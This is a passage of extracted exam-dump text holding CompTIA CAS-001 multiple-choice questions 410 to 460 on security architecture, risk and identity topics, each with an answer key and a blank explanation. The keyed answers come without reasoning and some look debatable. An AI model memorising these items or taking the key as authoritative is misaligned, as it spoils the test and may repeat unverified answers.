http://www.gratisexam.com/

QUESTION 410A system administrator needs to meet the maximum amount of security goals for a new DNS infrastructure. The administrator deploys DNSSEC extensions to thedomain names and infrastructure. Which of the following security goals does this meet? (Select TWO).

A. AvailabilityB. AuthenticationC. IntegrityD. ConfidentialityE. Encryption

Correct Answer: BCSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 411The risk manager is reviewing a report which identifies a requirement to keep a business critical legacy system operational for the next two years. The legacysystem is out of support because the vendor and security patches are no longer released. Additionally, this is a proprietary embedded system and little isdocumented and known about it. Which of the following should the Information Technology department implement to reduce the security risk from a compromise ofthis system?

A. Virtualize the system and migrate it to a cloud provider.B. Segment the device on its own secure network.C. Install an antivirus and HIDS on the system.D. Hire developers to reduce vulnerabilities in the code.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

Real 221CompTIA CAS-001 Exam

Page 218: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 412Two separate companies are in the process of integrating their authentication infrastructure into a unified single sign-on system. Currently, both companies use anAD backend and two factor authentication using TOTP. The system administrators have configured a trust relationship between the authentication backend toensure proper process flow. How should the employees request access to shared resources before the authentication integration is complete?

A. They should logon to the system using the username concatenated with the 6-digit code and their original password.B. They should logon to the system using the newly assigned global username: first.lastname#### where #### is the second factor code.C. They should use the username format: LAN\first.lastname together with their original password and the next 6-digit code displayed when the token button is

depressed.D. They should use the username format: [email protected], together with a password and their 6-digit code.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 413The Chief Risk Officer (CRO) has requested that the MTD, RTO and RPO for key business applications be identified and documented. Which of the followingbusiness documents would MOST likely contain the required values?

A. MOUB. BPAC. RAD. SLAE. BIA

Correct Answer: ESection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 414An organization is selecting a SaaS provider to replace its legacy, in house Customer Resource

Real 222

Page 219: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

CompTIA CAS-001 ExamManagement (CRM) application. Which of the following ensures the organization mitigates the risk of managing separate user credentials?

A. Ensure the SaaS provider supports dual factor authentication.B. Ensure the SaaS provider supports encrypted password transmission and storage.C. Ensure the SaaS provider supports secure hash file exchange.D. Ensure the SaaS provider supports role-based access control.E. Ensure the SaaS provider supports directory services federation.

Correct Answer: ESection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 415A forensic analyst receives a hard drive containing malware quarantined by the antivirus application. After creating an image and determining the directory locationof the malware file, which of the following helps to determine when the system became infected?

A. The malware file's modify, access, change time properties.B. The timeline analysis of the file system.C. The time stamp of the malware in the swap file.D. The date/time stamp of the malware detection in the antivirus logs.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 416After a security incident, an administrator would like to implement policies that would help reduce fraud and the potential for collusion between employees. Which ofthe following would help meet these goals by having co-workers occasionally audit another worker's position?

A. Least privilegeB. Job rotationC. Mandatory vacation

Page 220: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

D. Separation of duties

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

Real 223CompTIA CAS-001 Exam

QUESTION 417A security engineer at a software development company has identified several vulnerabilities in a product late in the development cycle. This causes a huge delayfor the release of the product. Which of the following should the administrator do to prevent these issues from occurring in the future?

A. Recommend switching to an SDLC methodology and perform security testing during each maintenance iterationB. Recommend switching to a spiral software development model and perform security testing during the requirements gatheringC. Recommend switching to a waterfall development methodology and perform security testing during the testing phaseD. Recommend switching to an agile development methodology and perform security testing during iterations

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 418Company XYZ is building a new customer facing website which must access some corporate resources. The company already has an internal facing web serverand a separate server supporting an extranet to which suppliers have access. The extranet web server is located in a network DMZ. The internal website is hostedon a laptop on the internal corporate network. The internal network does not restrict traffic between any internal hosts. Which of the following locations will BESTsecure both the intranet and the customer facing website?

A. The existing internal network segmentB. Dedicated DMZ network segmentsC. The existing extranet network segmentD. A third-party web hosting company

Page 221: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 419A security architect is locked into a given cryptographic design based on the allowable software at

Real 224CompTIA CAS-001 Examthe company. The key length for applications is already fixed as is the cipher and algorithm in use. The security architect advocates for the use of well-randomizedkeys as a mitigation to brute force and rainbow attacks. Which of the following is the security architect trying to increase in the design?

A. Key stretchingB. AvailabilityC. EntropyD. Root of trustE. Integrity

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 420Noticing latency issues at its connection to the Internet, a company suspects that it is being targeted in a Distributed Denial of Service attack. A security analystdiscovers numerous inbound monlist requests coming to the company's NTP servers. Which of the following mitigates this activity with the LEAST impact to existingoperations?

A. Block in-bound connections to the company's NTP servers.B. Block IPs making monlist requests.C. Disable the company's NTP servers.D. Disable monlist on the company's NTP servers.

Correct Answer: D

Page 222: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Section: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 421The Chief Executive Officer (CEO) of an Internet service provider (ISP) has decided to limit the company's contribution to worldwide Distributed Denial of Service(DDoS) attacks. Which of the following should the ISP implement? (Select TWO).

A. Block traffic from the ISP's networks destined for blacklisted IPs.B. Prevent the ISP's customers from querying DNS servers other than those hosted by the ISP.C. Block traffic with a source IP not allocated to the ISP from exiting the ISP's network.D. Scan the ISP's customer networks using an up-to-date vulnerability scanner.E. Notify customers when services they run are involved in an attack.

Real 225CompTIA CAS-001 Exam

Correct Answer: CESection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 422For companies seeking to move to cloud services, variances in regulation between jurisdictions can be addressed in which of the following ways?

A. Ensuring the cloud service provides high availability spanning multiple regions.B. Using an international private cloud model as opposed to public IaaS.C. Encrypting all data moved to or processed in a cloud-based service.D. Tagging VMs to ensure they are only run in certain geographic regions.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

Page 223: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 423A large organization that builds and configures every data center against distinct requirements loses efficiency, which results in slow response time to resolveissues. However, total uniformity presents other problems. Which of the following presents the GREATEST risk when consolidating to a single vendor or designsolution?

A. Competitors gain an advantage by increasing their service offerings.B. Vendor lock in may prevent negotiation of lower rates or prices.C. Design constraints violate the principle of open design.D. Lack of diversity increases the impact of specific events or attacks.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 424The Chief Executive Officer (CEO) of a company that allows telecommuting has challenged the Chief Security Officer's (CSO) request to harden the corporatenetwork's perimeter. The CEO argues that the company cannot protect its employees at home, so the risk at work is no different. Which of the following BESTexplains why this company should proceed with protecting its corporate network boundary?

Real 226CompTIA CAS-001 Exam

A. The corporate network is the only network that is audited by regulators and customers.B. The aggregation of employees on a corporate network makes it a more valuable target for attackers.C. Home networks are unknown to attackers and less likely to be targeted directly.D. Employees are more likely to be using personal computers for general web browsing when they are at home.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 425An industry organization has implemented a system to allow trusted authentication between all of its partners. The system consists of a web of trusted RADIUS

Page 224: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

servers communicating over the Internet. An attacker was able to set up a malicious server and conduct a successful man-in-the- middle attack. Which of thefollowing controls should be implemented to mitigate the attack in the future?

A. Use PAP for secondary authentication on each RADIUS serverB. Disable unused EAP methods on each RADIUS serverC. Enforce TLS connections between RADIUS serversD. Use a shared secret for each pair of RADIUS servers

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 426An organization would like to allow employees to use their network username and password to access a third-party service. The company is using Active DirectoryFederated Services for their directory service. Which of the following should the company ensure is supported by the third- party? (Select TWO).

A. LDAP/SB. SAMLC. NTLMD. OAUTHE. Kerberos

Correct Answer: BESection: (none)Explanation

Explanation/Reference:Explanation:

Real 227CompTIA CAS-001 Exam

QUESTION 427An extensible commercial software system was upgraded to the next minor release version to patch a security vulnerability. After the upgrade, an unauthorizedintrusion into the system was detected. The software vendor is called in to troubleshoot the issue and reports that all core components were updated properly.Which of the following has been overlooked in securing the system? (Select TWO).

Page 225: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. The company's IDS signatures were not updated.B. The company's custom code was not patched.C. The patch caused the system to revert to http.D. The software patch was not cryptographically signed.E. The wrong version of the patch was used.F. Third-party plug-ins were not patched.

Correct Answer: BFSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 428A security officer is leading a lessons learned meeting. Which of the following should be components of that meeting? (Select TWO).

A. Demonstration of IPS systemB. Review vendor selection processC. Calculate the ALE for the eventD. Discussion of event timelineE. Assigning of follow up items

Correct Answer: DESection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 429A network administrator with a company's NSP has received a CERT alert for targeted adversarial behavior at the company. In addition to the company's physicalsecurity, which of the following can the network administrator use to scan and detect the presence of a malicious actor physically accessing the company's networkor information systems from within? (Select TWO).

Real 228CompTIA CAS-001 Exam

Page 226: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. RASB. Vulnerability scannerC. HTTP interceptD. HIDSE. Port scannerF. Protocol analyzer

Correct Answer: DESection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 430An administrator's company has recently had to reduce the number of Tier 3 help desk technicians available to support enterprise service requests. As a result,configuration standards have declined as administrators develop scripts to troubleshoot and fix customer issues. The administrator has observed that severaldefault configurations have not been fixed through applied group policy or configured in the baseline. Which of the following are controls the administrator shouldrecommend to the organization's security manager to prevent an authorized user from conducting internal reconnaissance on the organization's network? (SelectTHREE).

A. Network file systemB. Disable command executionC. Port securityD. TLSE. Search engine reconnaissanceF. NIDSG. BIOS securityH. HIDSI. IdM

Correct Answer: BGISection: (none)Explanation

Explanation/Reference:Explanation:

Page 227: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 431A mature organization with legacy information systems has incorporated numerous new processes and dependencies to manage security as its networks andinfrastructure are modernized. The Chief Information Office has become increasingly frustrated with frequent releases, stating that the organization needseverything to work completely, and the vendor should already have those desires built into the software product. The vendor has been in constant communicationwith personnel and groups within the organization to understand its business process and capture new

Real 229CompTIA CAS-001 Examsoftware requirements from users. Which of the following methods of software development is this organization's configuration management process using?

A. AgileB. SDLC. WaterfallD. Joint application development

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 432Joe, the Chief Executive Officer (CEO), was an Information security professor and a Subject Matter Expert for over 20 years. He has designed a network defensemethod which he says is significantly better than prominent international standards. He has recommended that the company use his cryptographic method. Whichof the following methodologies should be adopted?

A. The company should develop an in-house solution and keep the algorithm a secret.B. The company should use the CEO's encryption scheme.C. The company should use a mixture of both systems to meet minimum standards.D. The company should use the method recommended by other respected information security organizations.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 433

Page 228: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

The security engineer receives an incident ticket from the helpdesk stating that DNS lookup requests are no longer working from the office. The network team hasensured that Layer 2 and Layer 3 connectivity are working. Which of the following tools would a security engineer use to make sure the DNS server is listening onport 53?

A. PINGB. NESSUSC. NSLOOKUPD. NMAP

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Real 230CompTIA CAS-001 Exam

Explanation:

QUESTION 434A large organization has recently suffered a massive credit card breach. During the months of Incident Response, there were multiple attempts to assign blame asto whose fault it was that the incident occurred. In which part of the incident response phase would this be addressed in a controlled and productive manner?

A. During the Identification PhaseB. During the Lessons Learned phaseC. During the Containment PhaseD. During the Preparation Phase

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 435A security administrator needs to deploy a remote access solution for both staff and contractors. Management favors remote desktop due to ease of use. Thecurrent risk assessment suggests protecting Windows as much as possible from direct ingress traffic exposure. Which of the following solutions should beselected?

Page 229: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. Deploy a remote desktop server on your internal LAN, and require an active directory integrated SSL connection for access.B. Change remote desktop to a non-standard port, and implement password complexity for the entire active directory domain.C. Distribute new IPSec VPN client software to applicable parties. Virtualize remote desktop services functionality.D. Place the remote desktop server(s) on a screened subnet, and implement two-factor authentication.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 436Real 231CompTIA CAS-001 ExamDue to compliance regulations, a company requires a yearly penetration test. The Chief Information Security Officer (CISO) has asked that it be done under a blackbox methodology. Which of the following would be the advantage of conducting this kind of penetration test?

A. The risk of unplanned server outages is reduced.B. Using documentation provided to them, the pen-test organization can quickly determine areas to focus on.C. The results will show an in-depth view of the network and should help pin-point areas of internal weakness.D. The results should reflect what attackers may be able to learn about the company.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 437The IT manager is evaluating IPS products to determine which would be most effective at stopping network traffic that contains anomalous content on networks thatcarry very specific types of traffic. Based on the IT manager's requirements, which of the following types of IPS products would be BEST suited for use in thissituation?

A. Signature-basedB. Rate-basedC. Anomaly-basedD. Host-based

Page 230: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 438A software project manager has been provided with a requirement from the customer to place limits on the types of transactions a given user can initiate withoutexternal interaction from another user with elevated privileges. This requirement is BEST described as an implementationof:

A. An administrative controlB. Dual controlC. Separation of dutiesD. Least privilege

Real 232CompTIA CAS-001 Exam

E. Collusion

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 439Which of the following is the information owner responsible for?

A. Developing policies, standards, and baselines.B. Determining the proper classification levels for data within the system.C. Integrating security considerations into application and system purchasing decisions.D. Implementing and evaluating security controls by validating the integrity of the data.

Correct Answer: BSection: (none)Explanation

Page 231: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation/Reference:Explanation:

QUESTION 440A Chief Information Security Officer (CISO) is approached by a business unit manager who heard a report on the radio this morning about an employee at acompeting firm who shipped a VPN token overseas so a fake employee could log into the corporate VPN. The CISO asks what can be done to mitigate the risk ofsuch an incident occurring within the organization. Which of the following is the MOST cost effective way to mitigate such a risk?

A. Require hardware tokens to be replaced on a yearly basis.B. Implement a biometric factor into the token response process.C. Force passwords to be changed every 90 days.D. Use PKI certificates as part of the VPN authentication process.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 441Two universities are making their 802.11n wireless networks available to the other university's students. The infrastructure will pass the student's credentials back tothe home school for authentication via the Internet.

Real 233CompTIA CAS-001 ExamThe requirements are:

Mutual authentication of clients and authentication server

The design should not limit connection speeds

Authentication must be delegated to the home school

No passwords should be sent unencrypted

The following design was implemented:

WPA2 Enterprise using EAP-PEAP-MSCHAPv2 will be used for wireless security

Page 232: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

RADIUS proxy servers will be used to forward authentication requests to the home school

The RADIUS servers will have certificates from a common public certificate authority

A strong shared secret will be used for RADIUS server authentication

Which of the following security considerations should be added to the design?

A. The transport layer between the RADIUS servers should be securedB. WPA Enterprise should be used to decrease the network overheadC. The RADIUS servers should have local accounts for the visiting studentsD. Students should be given certificates to use for authentication to the network

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 442A company has decided to move to an agile software development methodology. The company gives all of its developers security training. After a year of agile, amanagement review finds that the number of items on a vulnerability scan has actually increased since the methodology change. Which of the following bestpractices has MOST likely been overlooked in the agile implementation?

A. Penetration tests should be performed after each sprint.B. A security engineer should be paired with a developer during each cycle.C. The security requirements should be introduced during the implementation phase.D. The security requirements definition phase should be added to each sprint.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

Real 234CompTIA CAS-001 Exam

Page 233: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 443A system administrator has a responsibility to maintain the security of the video teleconferencing system. During a self-audit of the video teleconferencing room, theadministrator notices that speakers and microphones are hard-wired and wireless enabled. Which of the following security concerns should the systemadministrator have about the existing technology in the room?

A. Wired transmissions could be intercepted by remote users.B. Bluetooth speakers could cause RF emanation concerns.C. Bluetooth is an unsecure communication channel.D. Wireless transmission causes interference with the video signal.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 444A security engineer is a new member to a configuration board at the request of management. The company has two new major IT projects starting this year andwants to plan security into the application deployment. The board is primarily concerned with the applications' compliance with federal assessment and authorizationstandards. The security engineer asks for a timeline to determine when a security assessment of both applications should occur and does not attend subsequentconfiguration board meetings. If the security engineer is only going to perform a security assessment, which of the following steps in system authorization has thesecurity engineer omitted? (Select TWO).

A. Establish the security control baseline to be assessedB. Build the application according to software development security standardsC. Write the systems functionality requirements into the security requirements traceability matrixD. Review the results of user acceptance testingE. Categorize the applications according to useF. Consult with the stakeholders to determine which standards can be omitted

Correct Answer: AESection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 445

Page 234: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Real 235CompTIA CAS-001 ExamA security manager is collecting RFQ, RFP, and RFI publications to help identify the technology trends which a government will be moving towards in the future.This information is available to the public. By consolidating the information, the security manager will be able to combine several perspectives into a broader view oftechnology trends. This is an example of which of the following? (Select TWO).

A. Supervisory control and data acquisitionB. EspionageC. HacktivismD. Data aggregationE. Universal description discovery and integrationF. Open source intelligence gathering

Correct Answer: DFSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 446As a cost saving measure, a company has instructed the security engineering team to allow all consumer devices to be able to access the network. They haveasked for recommendations on what is needed to secure the enterprise, yet offer the most flexibility in terms of controlling applications, and stolen devices. Whichof the following is BEST suited for the requirements?

A. MEAP with Enterprise AppstoreB. Enterprise Appstore with client-side VPN softwareC. MEAP with TLSD. MEAP with MDM

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 447A company uses a custom Line of Business (LOB) application to facilitate all back-end manufacturing control. Upon investigation, it has been determined that the

Page 235: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

database used by the LOB application uses a proprietary data format. The risk management group has flagged this as a potential weakness in the company'soperational robustness. Which of the following would be the GREATEST concern when analyzing the manufacturing control application?

A. Difficulty backing up the custom databaseReal 236CompTIA CAS-001 Exam

B. Difficulty migrating to new hardwareC. Difficulty training new admin personnelD. Difficulty extracting data from the database

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 448An asset manager is struggling with the best way to reduce the time required to perform asset location activities in a large warehouse. A project manager indicatedthat RFID might be a valid solution if the asset manager's requirements were supported by current RFID capabilities. Which of the following requirements would beMOST difficult for the asset manager to implement?

A. The ability to encrypt RFID data in transmissionB. The ability to integrate environmental sensors into the RFID tagC. The ability to track assets in real time as they move throughout the facilityD. The ability to assign RFID tags a unique identifier

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 449Ann, a systems engineer, is working to identify an unknown node on the corporate network. To begin her investigative work, she runs the following nmap commandstring:

user@hostname:~$ sudo nmap O 192.168.1.54

Page 236: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Based on the output, nmap is unable to identify the OS running on the node, but the following ports are open on the device:

TCP/22

TCP/111

TCP/512-514

TCP/2049

TCP/32778

Based on this information, which of the following operating systems is MOST likely running on the

Real 237CompTIA CAS-001 Examunknown node?

A. LinuxB. WindowsC. SolarisD. OSX

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 450A security analyst is tasked to create an executive briefing, which explains the activity and motivation of a cyber adversary. Which of the following is the MOSTimportant content for the brief for management personnel to understand?

A. Threat actor types, threat actor motivation, and attack toolsB. Unsophisticated agents, organized groups, and nation statesC. Threat actor types, attack sophistication, and the anatomy of an attackD. Threat actor types, threat actor motivation, and the attack impact

Correct Answer: D

Page 237: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Section: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 451A security engineer has inherited an authentication project which integrates 1024-bit PKI certificates into the company infrastructure and now has a newrequirement to integrate 2048-bit PKI certificates so that the entire company will be interoperable with its vendors when the project is completed. The project is now25% complete, with 15% of the company staff being issued 1024- bit certificates. The provisioning of network based accounts has not occurred yet due to otherproject delays. The project is now expected to be over budget and behind its original schedule. Termination of the existing project and beginning a new project is aconsideration because of the change in scope. Which of the following is the security engineer's MOST serious concern with implementing this solution?

A. Succession planningB. PerformanceC. MaintainabilityD. Availability

Real 238CompTIA CAS-001 Exam

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 452A company has migrated its data and application hosting to a cloud service provider (CSP). To meet its future needs, the company considers an IdP. Why might thecompany want to select an IdP that is separate from its CSP? (Select TWO).

A. A circle of trust can be formed with all domains authorized to delegate trust to an IdPB. Identity verification can occur outside the circle of trust if specified or delegatedC. Replication of data occurs between the CSP and IdP before a verification occursD. Greater security can be provided if the circle of trust is formed within multiple CSP domainsE. Faster connections can occur between the CSP and IdP without the use of SAML

Correct Answer: ADSection: (none)

Page 238: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation

Explanation/Reference:Explanation:

QUESTION 453An internal committee comprised of the facilities manager, the physical security manager, the network administrator, and a member of the executive team has beenformed to address a recent breach at a company's data center. It was discovered that during the breach, an HVAC specialist had gained entry to an area thatcontained server farms holding sensitive financial data. Although the HVAC specialist was there to fix a legitimate issue, the investigation concluded security beprovided for the two entry and exit points for the server farm. Which of the following should be implemented to accomplish the recommendations of theinvestigation?

A. Implement a policy that all non-employees should be escorted in the data center.B. Place a mantrap at the points with biometric security.C. Hire an HVAC person for the company, eliminating the need for external HVAC people.D. Implement CCTV cameras at both points.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 454Real 239CompTIA CAS-001 ExamDuring a recent audit of servers, a company discovered that a network administrator, who required remote access, had deployed an unauthorized remote accessapplication that communicated over common ports already allowed through the firewall. A network scan showed that this remote access application had alreadybeen installed on one third of the servers in the company. Which of the following is the MOST appropriate action that the company should take to provide a moreappropriate solution?

A. Implement an IPS to block the application on the networkB. Implement the remote application out to the rest of the serversC. Implement SSL VPN with SAML standards for federationD. Implement an ACL on the firewall with NAT for remote access

Correct Answer: CSection: (none)Explanation

Page 239: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation/Reference:Explanation:

QUESTION 455A company wishes to purchase a new security appliance. A security administrator has extensively researched the appliances, and after presenting security choicesto the company's management team, they approve of the proposed solution. Which of the following documents should be constructed to acquire the securityappliance?

A. SLAB. RFQC. RFPD. RFI

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 456A small retail company recently deployed a new point of sale (POS) system to all 67 stores. The core of the POS is an extranet site, accessible only from retailstores and the corporate office over a split-tunnel VPN. An additional split-tunnel VPN provides bi-directional connectivity back to the main office, which providesvoice connectivity for store VoIP phones. Each store offers guest wireless functionality, as well as employee wireless. Only the staff wireless network has access tothe POS VPN. Recently, stores are reporting poor response times when accessing the POS application from store computers as well as degraded voice qualitywhen making phone calls. Upon investigation, it is determined that three store PCs are hosting malware, which is generating excessive network traffic. Aftermalware removal, the information security department is asked to

Real 240CompTIA CAS-001 Examreview the configuration and suggest changes to prevent this from happening again. Which of the following denotes the BEST way to mitigate future malware risk?

A. Deploy new perimeter firewalls at all stores with UTM functionality.B. Change antivirus vendors at the store and the corporate office.C. Move to a VDI solution that runs offsite from the same data center that hosts the new POS solution.D. Deploy a proxy server with content filtering at the corporate office and route all traffic through it.

Correct Answer: ASection: (none)

Page 240: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation

Explanation/Reference:Explanation:

QUESTION 457Executive management is asking for a new manufacturing control and workflow automation solution. This application will facilitate management of proprietaryinformation and closely guarded corporate trade secrets.

The information security team has been a part of the department meetings and come away with the following notes:

-Human resources would like complete access to employee data stored in the application. They would like automated data interchange with the employeemanagement application, a cloud-based SaaS application.

-Sales is asking for easy order tracking to facilitate feedback to customers.

-Legal is asking for adequate safeguards to protect trade secrets. They are also concerned with data ownership questions and legal jurisdiction.

-Manufacturing is asking for ease of use. Employees working the assembly line cannot be bothered with additional steps or overhead. System interaction needs tobe quick and easy.

-Quality assurance is concerned about managing the end product and tracking overall performance of the product being produced. They would like read-onlyaccess to the entire workflow process for monitoring and baselining.

The favored solution is a user friendly software application that would be hosted onsite. It has extensive ACL functionality, but also has readily available APIs forextensibility. It supports read- only access, kiosk automation, custom fields, and data encryption.

Which of the following departments' request is in contrast to the favored solution?

Real 241CompTIA CAS-001 Exam

A. ManufacturingB. LegalC. SalesD. Quality assuranceE. Human resources

Correct Answer: ESection: (none)Explanation

Page 241: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation/Reference:Explanation:

QUESTION 458News outlets are beginning to report on a number of retail establishments that are experiencing payment card data breaches. The data exfiltration is enabled bymalware on a compromised computer. After the initial exploit network mapping and fingerprinting occurs in preparation for further exploitation. Which of thefollowing is the MOST effective solution to protect against unrecognized malware infections, reduce detection time, and minimize any damage that might be done?

A. Remove local admin permissions from all users and change anti-virus to a cloud aware, push technology.B. Implement an application whitelist at all levels of the organization.C. Deploy a network based heuristic IDS, configure all layer 3 switches to feed data to the IDS for more effective monitoring.D. Update router configuration to pass all network traffic through a new proxy server with advanced malware detection.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 459The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day exploits. The CISO is concerned that an unrecognized threat couldcompromise corporate data and result in regulatory fines as well as poor corporate publicity. The network is mostly flat, with split staff/guest wireless functionality.Which of the following equipment MUST be deployed to guard against unknown threats?

A. Cloud-based antivirus solution, running as local admin, with push technology for definition updates.B. Implementation of an offsite data center hosting all company data, as well as deployment of VDI for all client computing needs.

Real 242CompTIA CAS-001 Exam

C. Host based heuristic IPS, segregated on a management VLAN, with direct control of the perimeter firewall ACLs.D. Behavior based IPS with a communication link to a cloud based vulnerability and threat feed.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

Page 242: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 460A small company's Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to improve the company's security posture with regard to targetedattacks. Which of the following should the CSO conduct FIRST?

A. Survey threat feeds from analysts inside the same industry.B. Purchase multiple threat feeds to ensure diversity and implement blocks for malicious traffic.C. Conduct an internal audit against industry best practices to perform a gap analysis.D. Deploy a UTM solution that receives frequent updates from a trusted industry vendor.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

